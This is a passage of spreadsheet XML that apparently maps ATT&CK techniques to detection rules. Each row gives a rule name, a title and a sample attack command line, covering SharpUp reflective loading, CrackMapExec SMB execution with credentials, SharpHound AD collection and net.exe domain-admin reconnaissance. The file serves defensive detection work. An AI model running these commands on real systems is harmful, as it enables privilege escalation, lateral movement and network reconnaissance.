      <c r="I1561" s="43" t="n"/>
      <c r="J1561" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1561" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1562" ht="15.75" customHeight="1" s="42">
      <c r="A1562" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1562" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C1562" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D1562" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E1562" s="43" t="inlineStr">
        <is>
          <t>[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes('C:\temp\SharpUp.bin')).EntryPoint.Invoke($null, @(,[string[]]@('UnquotedServicePath')))</t>
        </is>
      </c>
      <c r="F1562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1562" s="43" t="n"/>
      <c r="J1562" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1562" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1563" ht="15.75" customHeight="1" s="42">
      <c r="A1563" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1563" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C1563" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1563" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E1563" s="43" t="inlineStr">
        <is>
          <t>wscript.exe "C:\Windows\System32\gatherNetworkInfo.vbs"</t>
        </is>
      </c>
      <c r="F1563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1563" s="43" t="n"/>
      <c r="J1563" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1563" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1564" ht="15.75" customHeight="1" s="42">
      <c r="A1564" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1564" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C1564" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1564" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E1564" s="43" t="inlineStr">
        <is>
          <t>cscript.exe GATHER~1.VBS</t>
        </is>
      </c>
      <c r="F1564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1564" s="43" t="n"/>
      <c r="J1564" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1564" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1565" ht="15.75" customHeight="1" s="42">
      <c r="A1565" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1565" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C1565" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1565" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E1565" s="43" t="inlineStr">
        <is>
          <t>copy gatherNetworkInfo.vbs C:\Users\Public\discovery.txt &amp;&amp; cscript.exe C:\Users\Public\discovery.txt</t>
        </is>
      </c>
      <c r="F1565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1565" s="43" t="n"/>
      <c r="J1565" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1565" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1566" ht="15.75" customHeight="1" s="42">
      <c r="A1566" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1566" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C1566" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1566" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E1566" s="43" t="inlineStr">
        <is>
          <t>cscript //e:vbs gatherNetworkInfo.vbs</t>
        </is>
      </c>
      <c r="F1566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1566" s="43" t="n"/>
      <c r="J1566" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1566" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1567" ht="15.75" customHeight="1" s="42">
      <c r="A1567" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1567" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1567" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1567" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1567" s="43" t="inlineStr">
        <is>
          <t>update.exe smb 10.0.0.0/24 --username admin --password pass --local-auth --exec-method smbexec -x whoami</t>
        </is>
      </c>
      <c r="F1567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1567" s="43" t="n"/>
      <c r="J1567" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1567" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1568" ht="15.75" customHeight="1" s="42">
      <c r="A1568" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1568" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1568" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1568" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1568" s="43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F1568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1568" s="43" t="n"/>
      <c r="J1568" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1568" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1569" ht="15.75" customHeight="1" s="42">
      <c r="A1569" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1569" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1569" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1569" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1569" s="43" t="inlineStr">
        <is>
          <t>crackmapexec.exe smb 192.168.1.10/24 --user='admin' --pass='password' --local-auth</t>
        </is>
      </c>
      <c r="F1569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1569" s="43" t="n"/>
      <c r="J1569" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1569" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1570" ht="15.75" customHeight="1" s="42">
      <c r="A1570" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1570" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1570" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1570" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1570" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.100 --local-auth --user Administrator --pass P@ssw0rd123</t>
        </is>
      </c>
      <c r="F1570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1570" s="43" t="n"/>
      <c r="J1570" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1570" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1571" ht="15.75" customHeight="1" s="42">
      <c r="A1571" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1571" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1571" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1571" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1571" s="43" t="inlineStr">
        <is>
          <t>crackmapexec.exe smb 172.16.5.0/24 --local-auth -u admin -p pass</t>
        </is>
      </c>
      <c r="F1571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1571" s="43" t="n"/>
      <c r="J1571" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1571" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1572" ht="15.75" customHeight="1" s="42">
      <c r="A1572" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1572" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1572" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1572" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1572" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All</t>
        </is>
      </c>
      <c r="F1572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1572" s="43" t="n"/>
      <c r="J1572" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1572" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1573" ht="15.75" customHeight="1" s="42">
      <c r="A1573" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1573" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1573" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1573" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1573" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache</t>
        </is>
      </c>
      <c r="F1573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1573" s="43" t="n"/>
      <c r="J1573" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1573" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1574" ht="15.75" customHeight="1" s="42">
      <c r="A1574" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1574" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1574" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1574" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1574" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache -JsonFolder C:\Temp</t>
        </is>
      </c>
      <c r="F1574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1574" s="43" t="n"/>
      <c r="J1574" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1574" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1575" ht="15.75" customHeight="1" s="42">
      <c r="A1575" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1575" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1575" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1575" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1575" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache -JsonFolder C:\Temp -ZipFileName C:\Temp\data.zip</t>
        </is>
      </c>
      <c r="F1575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1575" s="43" t="n"/>
      <c r="J1575" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1575" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1576" ht="15.75" customHeight="1" s="42">
      <c r="A1576" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1576" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1576" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1576" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1576" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache -JsonFolder C:\Temp -ZipFileName C:\Temp\data.zip -PortScanTimeout 1000</t>
        </is>
      </c>
      <c r="F1576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1576" s="43" t="n"/>
      <c r="J1576" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1576" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1577" ht="15.75" customHeight="1" s="42">
      <c r="A1577" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1577" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1577" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1577" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1577" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache -JsonFolder C:\Temp -ZipFileName C:\Temp\data.zip -PortScanTimeout 1000 -Loop</t>
        </is>
      </c>
      <c r="F1577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1577" s="43" t="n"/>
      <c r="J1577" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1578" ht="15.75" customHeight="1" s="42">
      <c r="A1578" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1578" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1578" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1578" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1578" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache -JsonFolder C:\Temp -ZipFileName C:\Temp\data.zip -PortScanTimeout 1000 -Loop -Loopduration 60</t>
        </is>
      </c>
      <c r="F1578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1578" s="43" t="n"/>
      <c r="J1578" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1578" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1579" ht="15.75" customHeight="1" s="42">
      <c r="A1579" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1579" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1579" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1579" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1579" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache -JsonFolder C:\Temp -ZipFileName C:\Temp\data.zip -PortScanTimeout 1000 -Loop -Loopduration 60 -DCOnly</t>
        </is>
      </c>
      <c r="F1579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1579" s="43" t="n"/>
      <c r="J1579" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1579" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1580" ht="15.75" customHeight="1" s="42">
      <c r="A1580" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1580" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1580" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1580" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1580" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\net1  group "Domain\ Computers" /domain</t>
        </is>
      </c>
      <c r="F1580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1580" s="43" t="n"/>
      <c r="J1580" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1580" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1581" ht="15.75" customHeight="1" s="42">
      <c r="A1581" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1581" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1581" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1581" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1581" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\net1  group /domain "Domain\ controllers"</t>
        </is>
      </c>
      <c r="F1581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1581" s="43" t="n"/>
      <c r="J1581" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1581" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1582" ht="15.75" customHeight="1" s="42">
      <c r="A1582" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1582" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1582" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1582" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1582" s="43" t="inlineStr">
        <is>
          <t>net  group "Domain\ Computers" /domain</t>
        </is>
      </c>
      <c r="F1582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1582" s="43" t="n"/>
      <c r="J1582" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1582" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1583" ht="15.75" customHeight="1" s="42">
      <c r="A1583" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1583" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1583" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1583" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1583" s="43" t="inlineStr">
        <is>
          <t>net  group /domain "Domain\ controllers"</t>
        </is>
      </c>
      <c r="F1583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1583" s="43" t="n"/>
      <c r="J1583" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1583" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1584" ht="15.75" customHeight="1" s="42">
      <c r="A1584" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1584" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1584" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1584" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1584" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\net1  group "BUILTIN\\Backup\ Operators" /domain</t>
        </is>
      </c>
      <c r="F1584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1584" s="43" t="n"/>
      <c r="J1584" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1584" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1585" ht="15.75" customHeight="1" s="42">
      <c r="A1585" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1585" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1585" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1585" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1585" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\net1  group "Domain\ Admins" /domain</t>
        </is>
      </c>
      <c r="F1585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1585" s="43" t="n"/>
      <c r="J1585" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1585" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1586" ht="15.75" customHeight="1" s="42">
      <c r="A1586" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1586" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1586" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1586" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1586" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\net1  group "enterprise\ admins" /domain</t>
        </is>
      </c>
      <c r="F1586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1586" s="43" t="n"/>
      <c r="J1586" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1586" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1587" ht="15.75" customHeight="1" s="42">
      <c r="A1587" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1587" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1587" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1587" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1587" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\net1  group /domain</t>
        </is>
      </c>
      <c r="F1587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1587" s="43" t="n"/>
      <c r="J1587" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1587" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1588" ht="15.75" customHeight="1" s="42">
      <c r="A1588" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1588" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1588" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1588" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1588" s="43" t="inlineStr">
        <is>
          <t>net  group "BUILTIN\\Backup\ Operators" /domain</t>
        </is>
      </c>
      <c r="F1588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1588" s="43" t="n"/>
